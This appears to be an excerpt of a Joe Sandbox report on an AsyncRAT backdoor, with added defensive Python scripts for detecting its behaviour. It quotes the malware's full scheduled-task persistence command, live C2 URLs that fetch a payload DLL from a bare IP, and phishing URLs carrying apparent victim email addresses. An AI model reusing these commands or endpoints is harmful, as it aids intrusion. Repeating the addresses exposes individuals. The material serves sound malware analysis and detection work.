            Source: EGSh5caf8a.exe, 00000000.00000002.1314795117.00000000028DA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
            Source: EGSh5caf8a.exe, 00000000.00000002.1313648558.0000000000AED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeMemory allocated: page read and write | page guardJump to behavior
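The sleep entries above are the interesting part of this section: one thread asks for 922337203685477 ms (which is .NET's TimeSpan.MaxValue expressed in milliseconds, a sleep that can never elapse inside an analysis timeout), two threads loop through thousands of short sleeps, and thread 7196 sleeps for values that shrink by roughly 110 ms each time, the shape of a loop that keeps re-sleeping for "deadline minus now" so that a sandbox which shortens any single sleep gains nothing. The SBIEDLL.DLL and vmware strings are direct sandbox/VM checks; "Hyper-V RAW" is weaker evidence on its own, since that string also exists in the Winsock provider catalog of an ordinary Windows 10 host. The script below is an added example, not code from the Joe Sandbox report: it parses lines in the shape shown above and applies thresholds of the same form as the report's own signatures ("long sleeps (>= 3 min)", "sleep count > 30"). It assumes, since the page does not say so, that the delay values are milliseconds and that a negative "Thread sleep time" is a relative NT delay interval whose magnitude is the requested sleep.

```python
"""Sleep-stalling triage over Joe Sandbox-style behaviour lines.

Added example, not code from the report. Assumptions not stated on the
page: delay values are milliseconds; a negative "Thread sleep time" is a
relative NT delay interval, so its magnitude is the requested sleep.
"""
import re
from collections import defaultdict

# Constructed sample in the shape of the report's lines (values copied
# from the section above, not a live capture).
SAMPLE_LINES = """\
EGSh5caf8a.exe TID: 6664 Thread sleep time: -1100000s >= -30000s
EGSh5caf8a.exe TID: 7196 Thread sleep time: -20291418481080494s >= -30000s
EGSh5caf8a.exe TID: 7196 Thread sleep time: -200000s >= -30000s
EGSh5caf8a.exe TID: 7196 Thread sleep time: -99844s >= -30000s
EGSh5caf8a.exe TID: 7196 Thread sleep time: -99729s >= -30000s
EGSh5caf8a.exe TID: 7196 Thread sleep time: -99609s >= -30000s
EGSh5caf8a.exe TID: 7196 Thread sleep time: -99500s >= -30000s
EGSh5caf8a.exe TID: 7220 Thread sleep count: 2647 > 30
EGSh5caf8a.exe TID: 7244 Thread sleep time: -30000s >= -30000s
EGSh5caf8a.exe TID: 4044 Thread sleep time: -922337203685477s >= -30000s
EGSh5caf8a.exe Thread delayed: delay time: 50000
EGSh5caf8a.exe Thread delayed: delay time: 922337203685477
""".splitlines()

LONG_SLEEP_MS = 3 * 60 * 1000   # same bar as "Contains long sleeps (>= 3 min)"
LOOP_COUNT = 30                 # same bar as "Thread sleep count: N > 30"
# .NET TimeSpan.MaxValue is 2**63-1 ticks of 100 ns; in milliseconds that is
# 922337203685477, exactly the value the sample requests: a sleep that can
# never elapse inside an analysis timeout.
TIMESPAN_MAX_MS = (2**63 - 1) // 10_000

SLEEP_RE = re.compile(r"TID:\s*(\d+)\s*Thread sleep time:\s*(-?\d+)s")
COUNT_RE = re.compile(r"TID:\s*(\d+)\s*Thread sleep count:\s*(\d+)")
DELAY_RE = re.compile(r"Thread delayed: delay time:\s*(\d+)")


def parse_sleep_lines(lines):
    """Group sleep requests per thread; return (per_tid, counts, delays)."""
    per_tid = defaultdict(list)
    counts = {}
    delays = []
    for line in lines:
        if m := SLEEP_RE.search(line):
            per_tid[int(m.group(1))].append(abs(int(m.group(2))))
        elif m := COUNT_RE.search(line):
            counts[int(m.group(1))] = int(m.group(2))
        elif m := DELAY_RE.search(line):
            delays.append(int(m.group(1)))
    return per_tid, counts, delays


def countdown_run(sleeps, max_step=1000):
    """Longest run of consecutive sleeps that each shrink by at most
    max_step ms: the shape of a loop that re-sleeps for 'deadline - now'
    and so defeats sandboxes that shorten individual sleeps."""
    best = run = 1
    for prev, cur in zip(sleeps, sleeps[1:]):
        run = run + 1 if 0 < prev - cur <= max_step else 1
        best = max(best, run)
    return best


def triage_sleeps(lines):
    """Return ([(tid, reason), ...], total_finite_stall_ms)."""
    per_tid, counts, delays = parse_sleep_lines(lines)
    findings = []
    for tid, sleeps in per_tid.items():
        worst = max(sleeps)
        if worst >= TIMESPAN_MAX_MS:
            findings.append((tid, "never-elapsing sleep (>= TimeSpan.MaxValue in ms)"))
        elif worst >= LONG_SLEEP_MS:
            findings.append((tid, f"long sleep {worst // 60000} min"))
        run = countdown_run(sleeps)
        if run >= 3:
            findings.append((tid, f"countdown of {run} shrinking sleeps"))
    for tid, n in counts.items():
        if n > LOOP_COUNT:
            findings.append((tid, f"sleep loop, {n} iterations"))
    # Total stall actually requested, ignoring sentinels that never elapse.
    stall_ms = sum(v for v in delays if v < TIMESPAN_MAX_MS)
    return findings, stall_ms


if __name__ == "__main__":
    found, stall = triage_sleeps(SAMPLE_LINES)
    for tid, reason in found:
        print(f"TID {tid}: {reason}")
    print(f"requested finite stall: {stall} ms")
```

The countdown check is the one worth keeping in a real pipeline: a sandbox that patches Sleep to return early still sees the same shrinking sequence, because the sample computes each next wait from the wall clock rather than from the previous sleep.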

            HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000; 402000; 40E000; 410000; 886008
Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process created (28 times, identical apart from /st): C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st <time> /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST, with /st values 11:38, 11:38, 11:39, 11:40, 11:41, 11:42, 11:43, 11:43, 11:44, 11:45, 11:46, 11:47, 11:48, 11:48, 11:49, 11:50, 11:51, 11:52, 11:53, 11:55, 11:56, 11:57, 12:01, 12:07, 12:13, 12:17, 12:21, 12:25
Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process created (2 times): C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process created (11 times): unknown unknown
Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Queries volume information: C:\Users\user\Desktop\EGSh5caf8a.exe VolumeInformation
Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
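Two behaviours in this section are the ones to alert on. First, an RWX allocation at 0x400000 in a foreign aspnet_compiler.exe followed by a write whose first bytes are 4D5A ("MZ"): that is a PE image being placed at the default image base of a 32-bit executable in another process, the process-hollowing pattern, with a signed .NET Framework binary as the host. Second, a schtasks /create repeated every minute or so, always with the same task name, a Windows Update lure in the name, a target in the user's AppData, /ri 1 so the task re-runs every minute for /du 9999:59, /f to overwrite silently, and /RL HIGHEST; the case-mangled "SCHtAsKs.EXe" is a cheap attempt to slip past string-matching rules. The MachineGuid read at the end is a stable per-host value that loaders commonly turn into a bot identifier. The script below is an added example, not code from the Joe Sandbox report: it scores constructed event records that mirror the report's lines; the field names are this example's own, not a Joe Sandbox or Sysmon schema.

```python
"""Host-side triage of the two behaviours in this section: a PE image
written into a freshly started aspnet_compiler.exe, and a schtasks.exe
persistence task.

Added example, not code from the Joe Sandbox report. The event records are
constructed to mirror the report's lines; the field names are this
example's own.
"""
import ntpath
import re

SELF = r"C:\Users\user\Desktop\EGSh5caf8a.exe"
HOST = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
SCHTASKS_CMD = (r'"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 '
                r'/tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" '
                r'/st 11:38 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST')

EVENTS = [  # constructed from the report's lines
    {"type": "memory_allocated", "source": SELF, "target": HOST,
     "base": 0x400000, "protect": "page execute and read and write"},
    {"type": "memory_written", "source": SELF, "target": HOST,
     "base": 0x400000, "first_bytes": "4D5A"},
    {"type": "memory_written", "source": SELF, "target": HOST, "base": 0x402000},
    {"type": "process_created", "source": SELF, "cmdline": SCHTASKS_CMD},
    {"type": "process_created", "source": SELF,
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
]

USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\appdata\\", re.I)
UPDATE_LURE = re.compile(r"windows\s*updates?\d*$", re.I)


def tokenize(cmdline):
    """Split a Windows command line, keeping quoted paths whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def parse_schtasks(cmdline):
    """Return {flag: value or True} for a schtasks command line, else None."""
    tokens = tokenize(cmdline)
    if not tokens or not tokens[0].lower().endswith("schtasks.exe"):
        return None
    opts, i = {}, 1
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("/"):
            key = tok[1:].lower()
            nxt = tokens[i + 1] if i + 1 < len(tokens) else None
            if nxt is not None and not nxt.startswith("/"):
                opts[key] = nxt
                i += 2
                continue
            opts[key] = True
        i += 1
    return opts


def score_schtasks(cmdline):
    """Reasons a schtasks /create line looks like malware persistence."""
    opts = parse_schtasks(cmdline)
    if not opts or "create" not in opts:
        return []
    reasons = []
    image = tokenize(cmdline)[0]
    if image != image.lower() and image != image.upper():
        reasons.append(f"mixed-case image name {image!r} (cheap case-mangling)")
    if USER_WRITABLE.search(str(opts.get("tr", ""))):
        reasons.append("task runs a binary from a user-writable AppData path")
    if str(opts.get("rl", "")).upper() == "HIGHEST":
        reasons.append("/RL HIGHEST requests the highest available privileges")
    ri = opts.get("ri")
    if isinstance(ri, str) and ri.isdigit() and int(ri) <= 5:
        reasons.append(f"re-runs every {ri} minute(s) for /du {opts.get('du', '?')}")
    if "f" in opts:
        reasons.append("/f silently overwrites an existing task of the same name")
    if UPDATE_LURE.search(str(opts.get("tn", ""))):
        reasons.append(f"task name {opts['tn']!r} imitates Windows Update")
    return reasons


def score_remote_memory(ev):
    """Reasons for a cross-process allocate/write event; [] if in-process."""
    if ev["source"].lower() == ev.get("target", "").lower():
        return []
    reasons = []
    protect = ev.get("protect", "")
    if ev["type"] == "memory_allocated" and "execute" in protect and "write" in protect:
        reasons.append(f"RWX allocation in foreign process at {ev['base']:#x}")
    if ev["type"] == "memory_written" and ev.get("first_bytes", "").upper().startswith("4D5A"):
        reasons.append(f"PE header (MZ) written into foreign process at {ev['base']:#x}")
    if ev["base"] == 0x400000:
        reasons.append("address is the default image base of a 32-bit PE (hollowing pattern)")
    return reasons


def triage_host_events(events):
    """Return [(label, [reasons]), ...] for persistence and injection hits."""
    findings = []
    injected = {}
    for ev in events:
        if ev["type"] == "process_created":
            reasons = score_schtasks(ev["cmdline"])
            if reasons:
                findings.append(("persistence:schtasks", reasons))
        elif ev["type"] in ("memory_allocated", "memory_written"):
            bucket = injected.setdefault(ntpath.basename(ev["target"]), [])
            for r in score_remote_memory(ev):
                if r not in bucket:
                    bucket.append(r)
    findings.extend((f"injection:{name}", rs) for name, rs in injected.items() if rs)
    return findings


if __name__ == "__main__":
    for label, reasons in triage_host_events(EVENTS):
        print(label)
        for r in reasons:
            print("  -", r)
```

On a live host the same logic maps onto Sysmon event IDs 1 (process creation, for the schtasks line), 8/10 (remote thread and process access) and, for the MZ write, an EDR's cross-process WriteProcessMemory telemetry; the task itself can be confirmed afterwards with schtasks /query /tn WindowsUpdates797722446 /v.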

            Lowering of HIPS / PFW / Operating System Security Settings

Source: Yara match, file source: 0.2.EGSh5caf8a.exe.28dc200.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.EGSh5caf8a.exe.28dc200.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 00000000.00000002.1314795117.0000000002C4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000002.1314795117.00000000028DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: Process Memory Space: EGSh5caf8a.exe PID: 180, type: MEMORYSTR
MITRE ATT&CK matrix, techniques flagged for this sample by tactic (the numeric marker shown on each cell in the original matrix is kept in parentheses; unflagged matrix cells are omitted):
Execution: Scheduled Task/Job (2)
Persistence: Scheduled Task/Job (2); DLL Side-Loading (1)
Privilege Escalation: Scheduled Task/Job (2); Process Injection (311); DLL Side-Loading (1)
Defense Evasion: Masquerading (1); Disable or Modify Tools (1); Virtualization/Sandbox Evasion (31); Process Injection (311); Obfuscated Files or Information (111); Software Packing (1); Timestomp (1); DLL Side-Loading (1)
Discovery: Security Software Discovery (21); Process Discovery (1); Virtualization/Sandbox Evasion (31); Application Window Discovery (1); System Information Discovery (12)
Collection: Archive Collected Data (1)
Command and Control: Encrypted Channel (1); Non-Standard Port (11); Ingress Tool Transfer (1); Non-Application Layer Protocol (1); Application Layer Protocol (1)
No techniques flagged under Reconnaissance, Resource Development, Initial Access, Credential Access, Lateral Movement, Exfiltration or Impact.
Behavior Graph (ID 1428675; sample EGSh5caf8a.exe; start date 19/04/2024; architecture WINDOWS; score 100), recovered from the graph text:
Root signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 8 other signatures
EGSh5caf8a.exe (started from the root)
  Network: 204.12.199.30 (WIIUS, United States), ports 20991, 49708, 49709
  Dropped file: C:\Users\...\Accounts_Ledger_Software.eXE, PE32
  Signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Uses schtasks.exe or at.exe to add and modify task schedules; Writes to foreign memory regions; 2 other signatures
  Children: schtasks.exe (three shown) and 27 other processes; each shown schtasks.exe starts a conhost.exe, and the other processes start conhost.exe (three shown) plus 24 other processes

Source | Detection | Scanner | Label
EGSh5caf8a.exe | 50% | ReversingLabs | Win32.Backdoor.AsyncRAT
EGSh5caf8a.exe | 54% | Virustotal | -
Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE | 50% | ReversingLabs | Win32.Backdoor.AsyncRAT
C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE | 54% | Virustotal | -
            No Antivirus matches
            No Antivirus matches
Source | Detection | Scanner | Label
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | 0% | URL Reputation | safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | 0% | URL Reputation | safe
https://sectigo.com/CPS0 | 0% | URL Reputation | safe
http://schemas.m | 0% | URL Reputation | safe
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y | 0% | URL Reputation | safe
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | 0% | URL Reputation | safe
http://ocsp.sectigo.com0 | 0% | URL Reputation | safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | 0% | URL Reputation | safe
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0# | 0% | URL Reputation | safe
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | 0% | URL Reputation | safe
http://204.12.199.30:20991/async.txt | 2% | Virustotal | -
http://204.12.199.30:20991/hatthgola.vmp.dll | 1% | Virustotal | -
http://204.12.199.30:20991 | 0% | Virustotal | -
http://204.12.199.30:20991/hatthgola.vmp.dllC: | 1% | Virustotal | -
            No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://204.12.199.30:20991/async.txt | true | - | unknown
http://204.12.199.30:20991/hatthgola.vmp.dll | true | - | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | EGSh5caf8a.exe, Accounts_Ledger_Software.eXE.0.dr | false | URL Reputation: safe; URL Reputation: safe | unknown
https://sectigo.com/CPS0 | EGSh5caf8a.exe, Accounts_Ledger_Software.eXE.0.dr | false | URL Reputation: safe | unknown
http://schemas.m | schtasks.exe, 00000004.00000002.1218984003.0000000002FF8000.00000004.00000020.00020000.00000000.sdmp; schtasks.exe, 00000022.00000002.1258049891.00000000030C8000.00000004.00000020.00020000.00000000.sdmp; schtasks.exe, 0000003A.00000002.1281197103.00000000032F8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y | EGSh5caf8a.exe, Accounts_Ledger_Software.eXE.0.dr | false | URL Reputation: safe | unknown
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | EGSh5caf8a.exe, Accounts_Ledger_Software.eXE.0.dr | false | URL Reputation: safe | unknown
http://ocsp.sectigo.com0 | EGSh5caf8a.exe, Accounts_Ledger_Software.eXE.0.dr | false | URL Reputation: safe | unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | EGSh5caf8a.exe, Accounts_Ledger_Software.eXE.0.dr | false | URL Reputation: safe | unknown
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0# | EGSh5caf8a.exe, Accounts_Ledger_Software.eXE.0.dr | false | URL Reputation: safe | unknown
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | EGSh5caf8a.exe, Accounts_Ledger_Software.eXE.0.dr | false | URL Reputation: safe | unknown
http://204.12.199.30:20991/hatthgola.vmp.dllC: | Accounts_Ledger_Software.eXE.0.dr | false | - | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | EGSh5caf8a.exe, 00000000.00000002.1314795117.0000000002891000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://204.12.199.30:20991 | EGSh5caf8a.exe, 00000000.00000002.1314795117.0000000002891000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
http://schemas.microH | schtasks.exe, 00000024.00000002.1260760619.0000000002A0B000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
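The C2 traffic in these tables is plain HTTP to a bare IP (no domain was contacted, so there is no DNS record to pivot on) on port 20991, fetching a small text file and then a DLL, and the report's signature list notes the GETs carried no User-Agent. Reputation alone would not have caught it: Virustotal scores the two URLs at 1-2% at the time of analysis. The combination of indicators is the signal, and it is cheap to express over proxy or Zeek HTTP logs. The script below is an added example, not code from the Joe Sandbox report: it runs that logic over a constructed log in a Zeek http.log-like tab-separated layout whose field order is this example's own; only the server, port and URI paths come from the report, and the benign CRL request is made up for contrast.

```python
"""Network triage for the C2 pattern in this section: plain HTTP to a bare
IP on a non-standard port, no User-Agent, and an executable download.

Added example, not code from the Joe Sandbox report. The log below is
constructed; the field order is this example's own.
"""
import ipaddress
from collections import defaultdict

FIELDS = ["ts", "orig_h", "orig_p", "resp_h", "resp_p",
          "method", "host", "uri", "user_agent"]

# Constructed sample; "-" marks an absent field, as Zeek does. The third
# line is a made-up benign CRL fetch for contrast.
HTTP_LOG = """\
1713519420.1\t192.0.2.10\t49708\t204.12.199.30\t20991\tGET\t204.12.199.30:20991\t/async.txt\t-
1713519421.4\t192.0.2.10\t49709\t204.12.199.30\t20991\tGET\t204.12.199.30:20991\t/hatthgola.vmp.dll\t-
1713519430.0\t192.0.2.10\t49710\t198.51.100.7\t80\tGET\tcrl.sectigo.com\t/SectigoRSATimeStampingCA.crl\tMicrosoft-CryptoAPI/10.0
"""

STANDARD_HTTP_PORTS = {80, 443, 8000, 8080, 8443}
EXECUTABLE_SUFFIXES = (".dll", ".exe", ".scr")


def parse_http_log(text):
    """Parse the TSV above into dicts; resp_p becomes an int."""
    rows = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        rec = dict(zip(FIELDS, line.split("\t")))
        rec["resp_p"] = int(rec["resp_p"])
        rows.append(rec)
    return rows


def is_ip_literal(host):
    """True when the Host header is an address rather than a name, i.e. no
    DNS lookup preceded the request (the report lists no contacted domains)."""
    if host.startswith("["):                 # [v6]:port
        candidate = host[1:host.find("]")]
    elif host.count(":") == 1:               # v4:port
        candidate = host.split(":")[0]
    else:
        candidate = host
    try:
        ipaddress.ip_address(candidate)
        return True
    except ValueError:
        return False


def score_request(rec):
    """Indicators that fire on one HTTP request."""
    reasons = []
    if rec["resp_p"] not in STANDARD_HTTP_PORTS:
        reasons.append(f"HTTP on non-standard port {rec['resp_p']}")
    if is_ip_literal(rec["host"]):
        reasons.append("Host header is a bare IP, no DNS resolution")
    if rec["user_agent"] in ("", "-"):
        reasons.append("no User-Agent header")
    if rec["uri"].lower().endswith(EXECUTABLE_SUFFIXES):
        reasons.append(f"executable download {rec['uri']}")
    return reasons


def triage_http(text, min_reasons=2):
    """Aggregate per server. A request counts as a hit only when at least
    min_reasons indicators fire together, so one odd port alone is not enough."""
    servers = defaultdict(lambda: {"hits": 0, "reasons": [], "requests": []})
    for rec in parse_http_log(text):
        reasons = score_request(rec)
        if len(reasons) < min_reasons:
            continue
        entry = servers[rec["resp_h"]]
        entry["hits"] += 1
        entry["requests"].append(f"{rec['method']} {rec['host']}{rec['uri']}")
        for r in reasons:
            if r not in entry["reasons"]:
                entry["reasons"].append(r)
    return dict(servers)


if __name__ == "__main__":
    for server, entry in triage_http(HTTP_LOG).items():
        print(f"{server}: {entry['hits']} suspicious request(s)")
        for r in entry["reasons"]:
            print("  -", r)
```

The min_reasons threshold is deliberate: internal tooling talks to bare IPs and odd ports all the time, but a bare IP plus no User-Agent plus a .dll fetch from the same server is the profile of a stager, and the aggregation per resp_h keeps the two requests together as one finding.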
IP | Domain | Country | ASN | ASN Name | Malicious
204.12.199.30 | unknown | United States | 32097 | WIIUS | true
                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1428675
                Start date and time:2024-04-19 11:36:10 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 6m 42s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:70
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:EGSh5caf8a.exe
                renamed because original name is a hash value
                Original Sample Name:712940BAEF78C821E36B8701BF073C52.exe
                Detection:MAL
                Classification:mal100.troj.evad.winEXE@100/3@0/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 99%
                • Number of executed functions: 18
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Exclude process from analysis (whitelisted): dllhost.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, svchost.exe
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
11:37:00 | API Interceptor | 72x Sleep call for process: EGSh5caf8a.exe modified
11:37:02 | Task Scheduler | Run new task: WindowsUpdates797722446 path: C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE
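The Task Scheduler entry above is the sample's persistence mechanism: a task named like a Windows Update component whose action runs a binary from the user's AppData\Roaming tree. The Python below is an added example, not part of the Joe Sandbox report, showing the check a responder can run over the task definitions stored under C:\Windows\System32\Tasks. The task XML is constructed to match the task name and action path the report shows (the report itself does not include the task's XML); the "clean" Adobe task is a made-up comparison, and the regexes are this example's own heuristics.

```python
import re
import xml.etree.ElementTree as ET
from typing import List, Tuple

# Namespace used by every task definition stored under C:\Windows\System32\Tasks.
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Locations a standard user can write to; a Windows-component task should never execute from them.
USER_WRITABLE = re.compile(
    r"\\(AppData\\(Roaming|Local)|Users\\Public|ProgramData|Windows\\Temp|Temp)\\",
    re.IGNORECASE,
)
# Task names that imitate Windows Update ("WindowsUpdates797722446" in this report).
LOOKALIKE_NAME = re.compile(r"^(Microsoft|Windows)?Updates?\d*$", re.IGNORECASE)


def exec_actions(task_xml: str) -> List[Tuple[str, str]]:
    """Return (command, arguments) for every <Exec> action in a task definition."""
    root = ET.fromstring(task_xml)
    found = []
    for node in root.findall(".//t:Actions/t:Exec", TASK_NS):
        cmd = (node.findtext("t:Command", default="", namespaces=TASK_NS) or "").strip()
        args = (node.findtext("t:Arguments", default="", namespaces=TASK_NS) or "").strip()
        found.append((cmd, args))
    return found


def triage_task(task_name: str, task_xml: str) -> List[str]:
    """Return the reasons a task looks like user-land persistence; an empty list means nothing stood out."""
    reasons = []
    if LOOKALIKE_NAME.match(task_name):
        reasons.append(f"task name imitates a Windows component: {task_name}")
    for cmd, _args in exec_actions(task_xml):
        if USER_WRITABLE.search(cmd):
            reasons.append(f"action runs from a user-writable path: {cmd}")
        # Weak signal on its own, but the action path in this report ends in ".eXE".
        ext = cmd.rsplit(".", 1)[-1] if "." in cmd else ""
        if ext and ext != ext.lower() and ext != ext.upper():
            reasons.append(f"mixed-case extension on action: {cmd}")
    return reasons


# Constructed task definition matching the name and action path in this report's
# timeline; the report itself does not include the task XML.
SAMPLE_TASK_NAME = "WindowsUpdates797722446"
SAMPLE_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE</Command>
    </Exec>
  </Actions>
</Task>"""

# Made-up benign comparison task.
CLEAN_TASK_NAME = "Adobe Acrobat Update Task"
CLEAN_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions Context="Author">
    <Exec>
      <Command>C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe</Command>
    </Exec>
  </Actions>
</Task>"""

if __name__ == "__main__":
    for name, xml in ((SAMPLE_TASK_NAME, SAMPLE_TASK_XML), (CLEAN_TASK_NAME, CLEAN_TASK_XML)):
        hits = triage_task(name, xml)
        print(f"{name}: {'; '.join(hits) if hits else 'nothing suspicious'}")
```

On a live host the same function can be fed each file under C:\Windows\System32\Tasks (they are UTF-16 XML; decode before parsing) with the file name as the task name.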
                No context
                No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
WIIUS | https://held-messages.dariscompany.com/rich.hillyer@dish.com/held-messages | malicious | HTMLPhisher | 173.208.137.67
WIIUS | March 03-31-2024 statement.vbs | malicious | Remcos, GuLoader | 69.30.224.166
WIIUS | Benefits_Enrollment.htm | malicious | Unknown | 173.208.137.67
WIIUS | WxShqWep4r.exe | malicious | Remcos | 69.30.198.237
WIIUS | PO881620-2024.doc | malicious | Remcos | 69.30.198.237
WIIUS | kn328E7C2B.exe | malicious | LummaC, Glupteba, LummaC Stealer, SmokeLoader, Stealc | 173.208.242.178
WIIUS | https://nmefiu.aquarius-care.com/daniel.almodovar@aarcorp.com | malicious | Unknown | 173.208.137.67
WIIUS | Omkyhy25l0.elf | malicious | Mirai | 173.208.146.178
WIIUS | REijs2IfuB.elf | malicious | Gafgyt | 69.197.134.194
WIIUS | jdY5ClnBFK.elf | malicious | Gafgyt | 69.197.134.194
                No context
                No context
                Process:C:\Users\user\Desktop\EGSh5caf8a.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):1250
                Entropy (8bit):5.364365621440192
                Encrypted:false
                SSDEEP:24:MLUE4K5E4KlKDE4KhKiKhwE4Ty1KIE4oKNzKoZAE4Kzer84j:MIHK5HKlYHKh3owH8tHo6hAHKzervj
                MD5:ABF1CD151DCDEFA700E06EDBE67FA31C
                SHA1:9DCB86A4FC92FFBCDF0B739CB049FED673116123
                SHA-256:37C3377F04DA54703DF63C69424E83AD9B9D2C666B19D579BAF85EBC494B5B6F
                SHA-512:4B7FD3754154DE1FD4A775439ECEB35EF579ED4BEFAC6D26CDBF769BC579FD98FACB53F72182CD8867478D31A4068896A0190B46CEB7AEA04E836CE093C3D94E
                Malicious:false
